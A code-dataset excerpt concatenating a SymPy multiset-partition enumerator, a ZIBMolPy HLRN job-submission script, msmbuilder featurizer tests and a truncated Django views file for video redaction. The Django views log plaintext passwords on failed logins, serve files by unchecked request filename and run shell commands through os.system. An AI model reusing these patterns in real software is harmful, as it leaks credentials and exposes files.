shouldn't be, the resulting too-large partitions are filtered
by the enumeration one level up. However, as is usual in
constrained enumerations, failing early is advantageous.
The tests used by this method catch the most common cases,
although this implementation is by no means the last word on
this problem. The tests include:
1) ``lpart`` must be less than ``ub`` by at least 2. This is because
once a part has been decremented, the partition
will gain at least one child in the spread step.
2) If the leading component of the part is about to be
decremented, check for how many parts will be added in
order to use up the unallocated multiplicity in that
leading component, and fail if this number is greater than
allowed by ``ub``. (See code for the exact expression.) This
test is given in the answer to Knuth's problem 7.2.1.5.69.
3) If there is *exactly* enough room to expand the leading
component by the above test, check the next component (if
it exists) once decrementing has finished. If this has
``v == 0``, this next component will push the expansion over the
limit by 1, so fail.
"""
if self.lpart >= ub - 1:
self.p1 += 1 # increment to keep track of usefulness of tests
return False
plen = len(part)
for j in range(plen - 1, -1, -1):
# Knuth's mod, (answer to problem 7.2.1.5.69)
if (j == 0) and (part[0].v - 1)*(ub - self.lpart) < part[0].u:
self.k1 += 1
return False
if (j == 0 and part[j].v > 1) or (j > 0 and part[j].v > 0):
# found val to decrement
part[j].v -= 1
# Reset trailing parts back to maximum
for k in range(j + 1, plen):
part[k].v = part[k].u
# Have now decremented part, but are we doomed to
# failure when it is expanded? Check one oddball case
# that turns out to be surprisingly common - exactly
# enough room to expand the leading component, but no
# room for the second component, which has v=0.
if (plen > 1 and (part[1].v == 0) and
(part[0].u - part[0].v) ==
((ub - self.lpart - 1) * part[0].v)):
self.k2 += 1
self.db_trace("Decrement fails test 3")
return False
return True
return False
def decrement_part_large(self, part, amt, lb):
"""Decrements part, while respecting size constraint.
A part can have no children which are of sufficient size (as
indicated by ``lb``) unless that part has sufficient
unallocated multiplicity. When enforcing the size constraint,
this method will decrement the part (if necessary) by an
amount needed to ensure sufficient unallocated multiplicity.
Returns True iff the part was successfully decremented.
Parameters
==========
part
part to be decremented (topmost part on the stack)
amt
Can only take values 0 or 1. A value of 1 means that the
part must be decremented, and then the size constraint is
enforced. A value of 0 means just to enforce the ``lb``
size constraint.
lb
The partitions produced by the calling enumeration must
have more parts than this value.
"""
if amt == 1:
# In this case we always need to decrement, *before*
# enforcing the "sufficient unallocated multiplicity"
# constraint. Easiest for this is just to call the
# regular decrement method.
if not self.decrement_part(part):
return False
# Next, perform any needed additional decrementing to respect
# "sufficient unallocated multiplicity" (or fail if this is
# not possible).
min_unalloc = lb - self.lpart
if min_unalloc <= 0:
return True
total_mult = sum(pc.u for pc in part)
total_alloc = sum(pc.v for pc in part)
if total_mult <= min_unalloc:
return False
deficit = min_unalloc - (total_mult - total_alloc)
if deficit <= 0:
return True
for i in range(len(part) - 1, -1, -1):
if i == 0:
if part[0].v > deficit:
part[0].v -= deficit
return True
else:
return False # This shouldn't happen, due to above check
else:
if part[i].v >= deficit:
part[i].v -= deficit
return True
else:
deficit -= part[i].v
part[i].v = 0
def decrement_part_range(self, part, lb, ub):
"""Decrements part (a subrange of pstack), if possible, returning
True iff the part was successfully decremented.
Parameters
==========
part
part to be decremented (topmost part on the stack)
ub
the maximum number of parts allowed in a partition
returned by the calling traversal.
lb
The partitions produced by the calling enumeration must
have more parts than this value.
Notes
=====
Combines the constraints of _small and _large decrement
methods. If returns success, part has been decremented at
least once, but perhaps by quite a bit more if needed to meet
the lb constraint.
"""
# Constraint in the range case is just enforcing both the
# constraints from _small and _large cases. Note the 0 as the
# second argument to the _large call -- this is the signal to
# decrement only as needed for constraint enforcement. The
# short circuiting and left-to-right order of the 'and'
# operator is important for this to work correctly.
return self.decrement_part_small(part, ub) and \
self.decrement_part_large(part, 0, lb)
def spread_part_multiplicity(self):
"""Returns True if a new part has been created, and
adjusts pstack, f and lpart as needed.
Notes
=====
Spreads unallocated multiplicity from the current top part
into a new part created above the current on the stack. This
new part is constrained to be less than or equal to the old in
terms of the part ordering.
This call does nothing (and returns False) if the current top
part has no unallocated multiplicity.
"""
j = self.f[self.lpart] # base of current top part
k = self.f[self.lpart + 1] # ub of current; potential base of next
base = k # save for later comparison
changed = False # Set to true when the new part (so far) is
# strictly less than (as opposed to less than
# or equal to) the old.
for j in range(self.f[self.lpart], self.f[self.lpart + 1]):
self.pstack[k].u = self.pstack[j].u - self.pstack[j].v
if self.pstack[k].u == 0:
changed = True
else:
self.pstack[k].c = self.pstack[j].c
if changed: # Put all available multiplicity in this part
self.pstack[k].v = self.pstack[k].u
else: # Still maintaining ordering constraint
if self.pstack[k].u < self.pstack[j].v:
self.pstack[k].v = self.pstack[k].u
changed = True
else:
self.pstack[k].v = self.pstack[j].v
k = k + 1
if k > base:
# Adjust for the new part on stack
self.lpart = self.lpart + 1
self.f[self.lpart + 1] = k
return True
return False
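# Hedged illustration of the spread step (values follow the 'aabb' example in
# enum_all's docstring below): if the top part is ['a','b'] drawn from a
# multiset with multiplicities u=[2,2] and allocation v=[1,1], spreading moves
# the leftover multiplicity (one 'a' and one 'b') into a new top part, so the
# partition in progress becomes [['a','b'], ['a','b']].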
def top_part(self):
"""Return current top part on the stack, as a slice of pstack.
"""
return self.pstack[self.f[self.lpart]:self.f[self.lpart + 1]]
# Same interface and functionality as multiset_partitions_taocp(),
# but some might find this refactored version easier to follow.
def enum_all(self, multiplicities):
"""Enumerate the partitions of a multiset.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_all([2,2])
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a', 'b', 'b']],
[['a', 'a', 'b'], ['b']],
[['a', 'a'], ['b', 'b']],
[['a', 'a'], ['b'], ['b']],
[['a', 'b', 'b'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a', 'b'], ['a'], ['b']],
[['a'], ['a'], ['b', 'b']],
[['a'], ['a'], ['b'], ['b']]]
See also
========
multiset_partitions_taocp():
which provides the same result as this method, but is
about twice as fast. Hence, enum_all is primarily useful
for testing. Also see the function for a discussion of
states and visitors.
"""
self._initialize_enumeration(multiplicities)
while True:
while self.spread_part_multiplicity():
pass
# M4 Visit a partition
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part(self.top_part()):
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
def enum_small(self, multiplicities, ub):
"""Enumerate multiset partitions with no more than ``ub`` parts.
Equivalent to enum_range(multiplicities, 0, ub)
See also
========
enum_all, enum_large, enum_range
Parameters
==========
multiplicities
list of multiplicities of the components of the multiset.
ub
Maximum number of parts
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_small([2,2], 2)
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a', 'b', 'b']],
[['a', 'a', 'b'], ['b']],
[['a', 'a'], ['b', 'b']],
[['a', 'b', 'b'], ['a']],
[['a', 'b'], ['a', 'b']]]
The implementation is based, in part, on the answer given to
exercise 69, in Knuth [AOCP]_.
"""
# Keep track of iterations which do not yield a partition.
# Clearly, we would like to keep this number small.
self.discarded = 0
if ub <= 0:
return
self._initialize_enumeration(multiplicities)
while True:
good_partition = True
while self.spread_part_multiplicity():
self.db_trace("spread 1")
if self.lpart >= ub:
self.discarded += 1
good_partition = False
self.db_trace(" Discarding")
self.lpart = ub - 2
break
# M4 Visit a partition
if good_partition:
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part_small(self.top_part(), ub):
self.db_trace("Failed decrement, going to backtrack")
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
self.db_trace("Backtracked to")
self.db_trace("decrement ok, about to expand")
def enum_large(self, multiplicities, lb):
"""Enumerate the partitions of a multiset with lb < num(parts)
Equivalent to enum_range(multiplicities, lb, sum(multiplicities))
See also
========
enum_all, enum_small, enum_range
Parameters
==========
multiplicities
list of multiplicities of the components of the multiset.
lb
Number of parts in the partition must be greater than
this lower bound.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_large([2,2], 2)
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a'], ['b'], ['b']],
[['a', 'b'], ['a'], ['b']],
[['a'], ['a'], ['b', 'b']],
[['a'], ['a'], ['b'], ['b']]]
"""
self.discarded = 0
if lb >= sum(multiplicities):
return
self._initialize_enumeration(multiplicities)
self.decrement_part_large(self.top_part(), 0, lb)
while True:
good_partition = True
while self.spread_part_multiplicity():
if not self.decrement_part_large(self.top_part(), 0, lb):
# Failure here should be rare/impossible
self.discarded += 1
good_partition = False
break
# M4 Visit a partition
if good_partition:
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part_large(self.top_part(), 1, lb):
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
def enum_range(self, multiplicities, lb, ub):
"""Enumerate the partitions of a multiset with
``lb < num(parts) <= ub``.
In particular, if partitions with exactly ``k`` parts are
desired, call with ``(multiplicities, k - 1, k)``. This
method generalizes enum_all, enum_small, and enum_large.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_range([2,2], 1, 2)
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a', 'b'], ['b']],
[['a', 'a'], ['b', 'b']],
[['a', 'b', 'b'], ['a']],
[['a', 'b'], ['a', 'b']]]
"""
# combine the constraints of the _large and _small
# enumerations.
self.discarded = 0
if ub <= 0 or lb >= sum(multiplicities):
return
self._initialize_enumeration(multiplicities)
self.decrement_part_large(self.top_part(), 0, lb)
while True:
good_partition = True
while self.spread_part_multiplicity():
self.db_trace("spread 1")
if not self.decrement_part_large(self.top_part(), 0, lb):
# Failure here - possible in range case?
self.db_trace(" Discarding (large cons)")
self.discarded += 1
good_partition = False
break
elif self.lpart >= ub:
self.discarded += 1
good_partition = False
self.db_trace(" Discarding small cons")
self.lpart = ub - 2
break
# M4 Visit a partition
if good_partition:
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part_range(self.top_part(), lb, ub):
self.db_trace("Failed decrement, going to backtrack")
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
self.db_trace("Backtracked to")
self.db_trace("decrement ok, about to expand")
def count_partitions_slow(self, multiplicities):
"""Returns the number of partitions of a multiset whose elements
have the multiplicities given in ``multiplicities``.
Primarily for comparison purposes. It follows the same path as
enumerate, and counts, rather than generates, the partitions.
See Also
========
count_partitions
Has the same calling interface, but is much faster.
"""
# number of partitions so far in the enumeration
self.pcount = 0
self._initialize_enumeration(multiplicities)
while True:
while self.spread_part_multiplicity():
pass
# M4 Visit (count) a partition
self.pcount += 1
# M5 (Decrease v)
while not self.decrement_part(self.top_part()):
# M6 (Backtrack)
if self.lpart == 0:
return self.pcount
self.lpart -= 1
def count_partitions(self, multiplicities):
"""Returns the number of partitions of a multiset whose components
have the multiplicities given in ``multiplicities``.
For larger counts, this method is much faster than calling one
of the enumerators and counting the result. Uses dynamic
programming to cut down on the number of nodes actually
explored. The dictionary used in order to accelerate the
counting process is stored in the ``MultisetPartitionTraverser``
object and persists across calls. If the user does not
expect to call ``count_partitions`` for any additional
multisets, the object should be cleared to save memory. On
the other hand, the cache built up from one count run can
significantly speed up subsequent calls to ``count_partitions``,
so it may be advantageous not to clear the object.
Examples
========
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> m.count_partitions([9,8,2])
288716
>>> m.count_partitions([2,2])
9
>>> del m
Notes
=====
If one looks at the workings of Knuth's algorithm M [AOCP]_, it
can be viewed as a traversal of a binary tree of parts. A
part has (up to) two children, the left child resulting from
the spread operation, and the right child from the decrement
operation. The ordinary enumeration of multiset partitions is
an in-order traversal of this tree, and with the partitions
corresponding to paths from the root to the leaves. The
mapping from paths to partitions is a little complicated,
since the partition would contain only those parts which are
leaves or the parents of a spread link, not those which are
parents of a decrement link.
For counting purposes, it is sufficient to count leaves, and
this can be done with a recursive in-order traversal. The
number of leaves of a subtree rooted at a particular part is a
function only of that part itself, so memoizing has the
potential to speed up the counting dramatically.
This method follows a computational approach which is similar
to the hypothetical memoized recursive function, but with two
differences:
1) This method is iterative, borrowing its structure from the
other enumerations and maintaining an explicit stack of
parts which are in the process of being counted. (There
may be multisets which can be counted reasonably quickly by
this implementation, but which would overflow the default
Python recursion limit with a recursive implementation.)
2) Instead of using the part data structure directly, a more
compact key is constructed. This saves space, but more
importantly coalesces some parts which would remain
separate with physical keys.
Unlike the enumeration functions, there is currently no _range
version of count_partitions. If someone wants to stretch
their brain, it should be possible to construct one by
memoizing with a histogram of counts rather than a single
count, and combining the histograms.
"""
# number of partitions so far in the enumeration
self.pcount = 0
# dp_stack is list of lists of (part_key, start_count) pairs
self.dp_stack = []
# dp_map is a map part_key -> count, where count represents the
# number of multiset partitions which are descendants of a part
# with this key, **or any of its decrements**
# Thus, when we find a part in the map, we add its count
# value to the running total, cut off the enumeration, and
# backtrack
if not hasattr(self, 'dp_map'):
self.dp_map = {}
self._initialize_enumeration(multiplicities)
pkey = part_key(self.top_part())
self.dp_stack.append([(pkey, 0), ])
while True:
while self.spread_part_multiplicity():
pkey = part_key(self.top_part())
if pkey in self.dp_map:
# Already have a cached value for the count of the
# subtree rooted at this part. Add it to the
# running counter, and break out of the spread
# loop. The -1 below compensates for the leaf that
# this code path would otherwise find, since that leaf
# still gets counted by the increment below.
self.pcount += (self.dp_map[pkey] - 1)
self.lpart -= 1
break
else:
self.dp_stack.append([(pkey, self.pcount), ])
# M4 count a leaf partition
self.pcount += 1
# M5 (Decrease v)
while not self.decrement_part(self.top_part()):
# M6 (Backtrack)
for key, oldcount in self.dp_stack.pop():
self.dp_map[key] = self.pcount - oldcount
if self.lpart == 0:
return self.pcount
self.lpart -= 1
# At this point have successfully decremented the part on
# the stack and it does not appear in the cache. It needs
# to be added to the list at the top of dp_stack
pkey = part_key(self.top_part())
self.dp_stack[-1].append((pkey, self.pcount),)
def part_key(part):
"""Helper for MultisetPartitionTraverser.count_partitions that
creates a key for ``part``, that only includes information which can
affect the count for that part. (Any irrelevant information just
reduces the effectiveness of dynamic programming.)
Notes
=====
This function is a candidate for future exploration. There
are likely symmetries that can be exploited to coalesce some
``part_key`` values, and thereby save space and improve
performance.
"""
# The component number is irrelevant for counting partitions, so
# leave it out of the memo key.
rval = []
for ps in part:
rval.append(ps.u)
rval.append(ps.v)
return tuple(rval)
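# Hedged sanity-check sketch (not part of the original module); the expected
# value 9 follows the count_partitions docstring above:
#
#   if __name__ == '__main__':
#       _m = MultisetPartitionTraverser()
#       assert _m.count_partitions([2, 2]) == _m.count_partitions_slow([2, 2]) == 9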
|
wxgeo/geophar
|
wxgeometrie/sympy/utilities/enumerative.py
|
Python
|
gpl-2.0
| 43,440
|
[
"VisIt"
] |
53295876afc43f015b718d2cdf9b1acbb6af3afcdcef43f52fbb2a57f1b7ddc2
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
What it does
============
B{This is the fifth step of ZIBgridfree.}
This tool performs the task of L{zgf_mdrun} on HLRN. In addition to the inherited L{zgf_mdrun} options, you can pick several options for the HLRN job script, such as job queue, time limit, and e-mail notification. It is also possible to allocate a larger number of nodes and subdivide these into separate L{zgf_mdrun} processes. Alternatively, you can call this tool several times on the same node pool to submit multiple smaller jobs. For more information, please refer to the L{zgf_mdrun} documentation.
B{The next step is L{zgf_refine}, if you want to refine or extend nodes where convergence has not been achieved. Otherwise, you can proceed with L{zgf_reweight}.}
How it works
============
At the command line, type::
$ zgf_submit_job_HLRN [options]
"""
import subprocess
import re
import sys
import tempfile
import math
import os
import zgf_mdrun
from ZIBMolPy.pool import Pool
from ZIBMolPy.ui import Option, OptionsList
def load_queues():
try:
p = subprocess.Popen(['qstat','-q'], stdout=subprocess.PIPE)
stdout = p.communicate()[0]
assert(p.returncode == 0)
foo = re.match(".*\nQueue\s[^\n]*\n[- ]*(\n.*)", stdout, re.DOTALL).group(1)
return( re.findall("\n(\w+)\s", foo) )
except:
return([])
options_desc = OptionsList([
Option("C", "commandhlrn", "choice", "parallel PBS executable HLRN3", choices=("aprun","mpiexec","none")),
Option("Q", "queue", "choice", "queue for scheduling", choices=["auto",]+sorted(load_queues())),
Option("N", "nodes", "int", "number of computing cluster nodes", default=2, min_value=1),
Option("P", "ppn", "int", "number of processors per node", default=24, min_value=1),
Option("W", "walltime", "float", "job-walltime in hours", default=1.0, min_value=0.1),
Option("M", "email", "str", "email-address for notifications"),
Option("D", "dryrun", "bool", "Only generates job-file, but does not submit it", default=False),
Option("S", "subdivide", "int", "number of parallel zgf_mdrun processes started within the job", min_value=1, default=1),
Option("A", "account", "str", "account to be debited"),
])
sys.modules[__name__].__doc__ += options_desc.epytext() # for epydoc
# reuse some options from zgf_mdrun
FORWARDED_ZGF_MDRUN_OPTIONS = ("seq", "npme", "reprod", "pd", "convtest", "auto-refines", "multistart")
for x in FORWARDED_ZGF_MDRUN_OPTIONS:
options_desc.append(zgf_mdrun.options_desc[x])
def is_applicable():
pool = Pool()
return(len(pool.where("state in ('em-mdrun-able', 'mdrun-able', 'rerun-able-converged', 'rerun-able-not-converged')")) > 0)
#===============================================================================
def main():
options = options_desc.parse_args(sys.argv)[0]
assert(options.nodes % options.subdivide == 0)
joblines = ["#!/bin/bash"]
joblines += ["#PBS -N zgf_job", "#PBS -j oe",]
if(options.email):
joblines += ["#PBS -m ea -M "+options.email]
if(options.account):
joblines += ["#PBS -A "+options.account]
wt_hours = math.floor(options.walltime)
wt_minutes = (options.walltime - wt_hours) * 60
joblines += ["#PBS -l walltime=%0.2d:%0.2d:00"%(wt_hours, wt_minutes)]
if(options.queue != "auto"):
joblines += ["#PBS -q "+options.queue]
joblines += ["#PBS -l nodes=%d:ppn=%d"%(options.nodes, options.ppn)]
joblines += ["source ${MODULESHOME}/init/sh"]
#for m in ("gromacs/gromacs-4.5.4-single", "zibmolpy"):
for m in os.environ['LOADEDMODULES'].split(":"):
joblines += ["module load "+m]
# on some machines the local module has to be loaded ... deprecated on HLRN3
#joblines += ['if ! python -c "import numpy" &>/dev/null; then']
#joblines += [' module load local']
#joblines += ['fi']
joblines += ["set -x"]
joblines += ["hostname --fqdn"]
joblines += ["export"]
joblines += ["date"]
joblines += ["cd $PBS_O_WORKDIR"]
zgfmdrun_call = "zgf_mdrun --np=%d"%(options.nodes*options.ppn / options.subdivide)
zgfmdrun_call += " --pbs=" + options.commandhlrn
# forward options to zgf_mdrun
for o in zgf_mdrun.options_desc:
if(o.long_name in FORWARDED_ZGF_MDRUN_OPTIONS):
zgfmdrun_call += " " + " ".join(o.forward_value(options))
# TODO better: "-option=value" , meaning wrap each item in quotes
# ... the shell should remove them.
for i in range(options.subdivide):
joblines += [zgfmdrun_call + " &> zgf_mdrun.${PBS_JOBID}.%d.log &"%i]
joblines += ["wait"]
joblines += ["date"]
content = "\n".join(joblines)
content += "\n#EOF\n"
print "Generated Jobfile:\n"+content
sys.stdout.flush()
fn = tempfile.mkstemp(prefix='tmp', suffix='.sh')[1]
f = open(fn, "w")
f.write(content)
f.close()
if(not options.dryrun):
subprocess.check_call(["msub", "-v", "MODULEPATH",fn])
os.remove(fn)
#==========================================================================
if(__name__=="__main__"):
main()
#EOF
|
CMD-at-ZIB/ZIBMolPy
|
tools/zgf_submit_job_HLRN.py
|
Python
|
lgpl-3.0
| 4,924
|
[
"Gromacs"
] |
6156ed911ca4cd45f31158780144d2e47a917cfe10835adbc3ae72fdbee58179
|
import warnings
import mdtraj as md
import numpy as np
from msmbuilder.featurizer import LigandContactFeaturizer
from msmbuilder.featurizer import BinaryLigandContactFeaturizer
from msmbuilder.featurizer import LigandRMSDFeaturizer
def _random_trajs():
top = md.Topology()
c = top.add_chain()
r = top.add_residue('HET', c)
r2 = top.add_residue('HET', c)
r3 = top.add_residue('HET', c)
cx = top.add_chain()
rx = top.add_residue('HET', cx)
for _ in range(10):
top.add_atom('CA', md.element.carbon, r)
top.add_atom('CA', md.element.carbon, r2)
top.add_atom('CA', md.element.carbon, r3)
for _ in range(10):
top.add_atom('CA', md.element.carbon, rx)
traj = md.Trajectory(xyz=np.random.uniform(size=(100, 40, 3)),
topology=top,
time=np.arange(100))
ref = md.Trajectory(xyz=np.random.uniform(size=(1, 40, 3)),
topology=top,
time=np.arange(1))
return traj, ref
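# Note: _random_trajs builds a two-chain topology -- chain 0 holds three
# 10-atom residues (treated as the protein) and chain 1 a single 10-atom
# residue (the ligand) -- together with a 100-frame random trajectory and a
# 1-frame reference; test_chain_guessing below relies on this chain layout.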
def _random_natural_trajs():
top = md.Topology()
c = top.add_chain()
r = top.add_residue('HET', c)
r2 = top.add_residue('HET', c)
r3 = top.add_residue('HET', c)
cx = top.add_chain()
rx = top.add_residue('HET', cx)
atypes = {"C": md.element.carbon,
"CA": md.element.carbon,
"N": md.element.nitrogen}
for name, t in atypes.items():
top.add_atom(name, t, r)
top.add_atom(name, t, r2)
top.add_atom(name, t, r3)
top.add_atom('CA', md.element.carbon, rx)
traj = md.Trajectory(xyz=np.random.uniform(size=(100, 10, 3)),
topology=top,
time=np.arange(100))
ref = md.Trajectory(xyz=np.random.uniform(size=(1, 10, 3)),
topology=top,
time=np.arange(1))
return traj, ref
def test_chain_guessing():
traj, ref = _random_trajs()
feat = LigandContactFeaturizer(reference_frame=ref)
contacts = feat.transform(traj)
assert feat.protein_chain == 0
assert feat.ligand_chain == 1
assert len(contacts) == 100
assert contacts[0].shape[1] == 3
def test_binding_pocket():
traj, ref = _random_trajs()
feat = LigandContactFeaturizer(reference_frame=ref)
pocket_ref = feat.transform([ref])
limit = (max(pocket_ref[0][0]) + min(pocket_ref[0][0]))/2.0
number_included = sum(pocket_ref[0][0] < limit)
pocket_feat = LigandContactFeaturizer(reference_frame=ref,
binding_pocket=limit)
pocket_contacts = pocket_feat.transform(traj)
assert len(pocket_contacts[0][0]) == number_included
def test_binaries():
traj, ref = _random_trajs()
feat = BinaryLigandContactFeaturizer(reference_frame=ref, cutoff=0.1)
binaries = feat.transform(traj)
assert np.sum(binaries[:]) <= len(binaries)*binaries[0].shape[1]
def test_ca_binaries():
traj, ref = _random_natural_trajs()
feat = BinaryLigandContactFeaturizer(reference_frame=ref,
cutoff=0.1, scheme='ca')
binaries = feat.transform(traj)
assert np.sum(binaries[:]) <= len(binaries)*binaries[0].shape[1]
def test_binaries_binding_pocket():
traj, ref = _random_trajs()
feat = LigandContactFeaturizer(reference_frame=ref)
pocket_ref = feat.transform([ref])
limit = (max(pocket_ref[0][0]) + min(pocket_ref[0][0]))/2.0
cutoff = limit*0.8
number_included = sum(pocket_ref[0][0] < limit)
pocket_feat = BinaryLigandContactFeaturizer(reference_frame=ref,
cutoff=cutoff,
binding_pocket=limit)
pocket_binaries = pocket_feat.transform(traj)
assert len(pocket_binaries[0][0]) == number_included
assert (np.sum(pocket_binaries[:]) <=
len(pocket_binaries)*pocket_binaries[0].shape[1])
def test_single_index_rmsd():
traj, ref = _random_trajs()
feat = LigandRMSDFeaturizer(reference_frame=ref,
calculate_indices=[ref.n_atoms-1])
single_cindex = feat.transform([traj])
assert np.unique(single_cindex).shape[0] > 1
# this actually won't pass for standard mdtraj rmsd
# with len(atom_indices)=1, I think because of the superposition
# built into the calculation
def test_mdtraj_equivalence():
traj, ref = _random_trajs()
feat = LigandRMSDFeaturizer(reference_frame=ref, align_by='custom',
calculate_for='custom', align_indices=range(ref.n_atoms),
calculate_indices=range(ref.n_atoms))
multi_chain = feat.transform([traj])
md_traj = md.rmsd(traj,ref,frame=0)
np.testing.assert_almost_equal(multi_chain[0][:, 0], md_traj, decimal=4)
|
msultan/msmbuilder
|
msmbuilder/tests/test_ligandfeaturizers.py
|
Python
|
lgpl-2.1
| 4,822
|
[
"MDTraj"
] |
7b83d4796b850ec74d1bc894ae41caa07a3ee511f87c1b61c458ff4f288d59b1
|
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
import os
import json
import re
from models import Word, ProcessingLog, RedactionEvent
def get_settings():
f = open(os.path.join(os.getcwd(), '../settings.json'))
settings = f.read()
return json.loads(settings)
def home(request):
settings = get_settings()
return render_to_response('home.html', {'system_name': settings['system_name']})
def is_logged_in(request):
return HttpResponse(request.user.is_authenticated())
@login_required
def test_artibury_ffmpeg_options(request):
import os
print os.getcwd()
os.system('rm test_videos/overredacted_*; rm test_videos/frames/*')
videos = [name for name in os.listdir("test_videos") if name.endswith(".mp4")]
color = True if request.GET['color'] == 'true' else False
blurn = int(request.GET['blurn'])
if color:
color = ''
else:
color = 'format=gray,'
for video in videos:
command = 'ffmpeg -threads 0 -i test_videos/%s -crf 20 -preset ultrafast -vf %s"boxblur=%s:%s",format=yuv422p -an test_videos/overredacted_%s' % (video,color,blurn,blurn,video)
fcommand = command
os.system(command)
command = 'ffmpeg -i test_videos/overredacted_%s -vf fps=1/30 test_videos/frames/%s_img\%%04d.jpg' % (video, video)
#os.system(command)
#command = 'ffmpeg -i test_videos/overredacted_%s -vf fps=1/30 test_videos/frames/n%s_img\%%04d.jpg' % (video, video)
os.system(command)
overredacted_frames = ['/test_frames/' + item for item in sorted(os.listdir("test_videos/frames"))]
print color, blurn, fcommand
return HttpResponse(json.dumps(overredacted_frames), content_type="application/json")
@login_required
def detected_regions(request):
return HttpResponse(json.dumps(sorted(os.listdir('media/detected_regions/frames/'))), content_type="application/json")
@login_required
def test_ffmpeg_options(request):
import os
print os.getcwd()
overredacted_frames = ['/test_frames/' + item for item in sorted(os.listdir("test_videos/frames")) if 'color_'+request.GET['color']+'_blurn_'+str(request.GET['blurn'])+'_' in item]
return HttpResponse(json.dumps(overredacted_frames), content_type="application/json")
@login_required
def current_settings(request):
f = open(os.path.join(os.getcwd(), '../settings.json'))
settings = f.read()
return HttpResponse(settings, content_type="application/json")
def is_capitalized(word):
if not word:
return False
else:
return word[0].isupper()
@login_required
def change_settings(request):
import time
timestr = time.strftime("%Y%m%d-%H%M%S")
# backup the current settings
os.system('mkdir ../settings_backups; cp ../settings.json ../settings_backups/settings_%s.json' % (timestr))
f = open(os.path.join(os.getcwd(), '../settings.json'))
settings = json.loads(f.read())
f.close()
new_settings = json.loads(request.POST['new_settings'])
settings.update(new_settings)
f = open(os.path.join(os.getcwd(), '../settings.json'), 'w')
settings = f.write(json.dumps(settings))
f.close()
return HttpResponse('done')
@login_required
def test_frames(request, filename):
import magic
mime = magic.Magic(mime=True)
filepath = os.path.join(os.getcwd(), 'test_videos/frames/'+filename)
print 'filepath', filepath
image_data = open(filepath, "rb").read()
return HttpResponse(image_data, content_type=mime.from_file(filepath))
def login(request):
from django.contrib.auth import authenticate, login
# If the request is a HTTP POST, try to pull out the relevant information.
if request.method == 'POST':
# Gather the username and password provided by the user.
# This information is obtained from the login form.
username = request.POST['username']
password = request.POST['password']
# Use Django's machinery to attempt to see if the username/password
# combination is valid - a User object is returned if it is.
user = authenticate(username=username, password=password)
# If we have a User object, the details are correct.
# If None (Python's way of representing the absence of a value), no user
# with matching credentials was found.
if user:
# Is the account active? It could have been disabled.
if user.is_active:
# If the account is valid and active, we can log the user in.
# We'll send the user back to the homepage.
login(request, user)
return HttpResponse('valid')
else:
# An inactive account was used - no logging in!
return HttpResponse("invalid")
else:
# Bad login details were provided. So we can't log the user in.
print "Invalid login details: {0}, {1}".format(username, password)
return HttpResponse("invalid")
@login_required
def logout(request):
from django.contrib.auth import logout
logout(request)
return HttpResponse('Logged out')
def get_random_id():
import random
return ''.join(random.choice('0123456789ABCDEF') for i in range(16))
def extract_narrative(report):
preview = report
lines = preview.split('\n')
if '15 INITIAL INCIDENT DESCRIPTION / NARRATIVE:' in preview:
preview = lines[lines.index('15 INITIAL INCIDENT DESCRIPTION / NARRATIVE:') + 1: lines.index('I hereby declare (certify) under penalty of perjury under the laws of the')]
elif 'OFFICER NARATIVE' in preview:
preview = lines[lines.index('OFFICER NARATIVE') + 1: lines.index('I hereby declare (certify) under penalty of perjury under the laws of the')]
else:
preview = lines[1:lines.index('I hereby declare (certify) under penalty of perjury under the laws of the')]
if preview[0].startswith('['):
preview[0] = preview[0][1:]
unneccessaries = ['Page', 'For: ', 'PATROL', 'CLEARANCE', 'NARRATIVE', 'OFFICER NARRATIVE', 'NARRATIVE TEXT HARDCOPY', 'SEATTLE POLICE DEPARTMENT', 'GENERAL OFFENSE HARDCOPY', 'PUBLIC DISCLOSURE RELEASE COPY', 'GO#', 'LAW DEPT BY FOLLOW-UP UNIT', ']']
for unneccessary in unneccessaries:
preview = [line.strip() for line in preview if not line.startswith(unneccessary)]
import re
preview = [line.strip() for line in preview if not re.search('[A-Z0-9]+\-[A-Z0-9]+ [A-Z0-9]+\-[A-Z0-9]+', line)]
preview = [line.strip() for line in preview if not re.search('\d+\-\d+ [A-Z]+ [A-Z\-]+', line)]
preview = [line.strip() for line in preview if not re.search('^[A-Z\-]+$', line.strip())]
preview = [line.strip() for line in preview if not line.startswith('Author:')]
preview = [line.strip() for line in preview if not line.startswith('Related date:')]
preview = '\n'.join(preview)
paragraphs = preview.split('\n\n')
#print 'parahraphs', len(paragraphs)
paragraphs = [paragraph.replace('\n', ' ') for paragraph in paragraphs]
preview = '\n\n'.join(paragraphs)
preview = preview.replace('\n'*5, ' ')
preview = preview.replace('\n'*4, ' ')
preview = preview.replace('\n'*3, ' ')
preview = preview.strip()
preview = preview.replace('Sgt.', 'Sgt')
return preview
def get_redacted_words(narrative):
from models import Word
import re
safe_words = [w.word for w in Word.objects.filter(safe=True)]
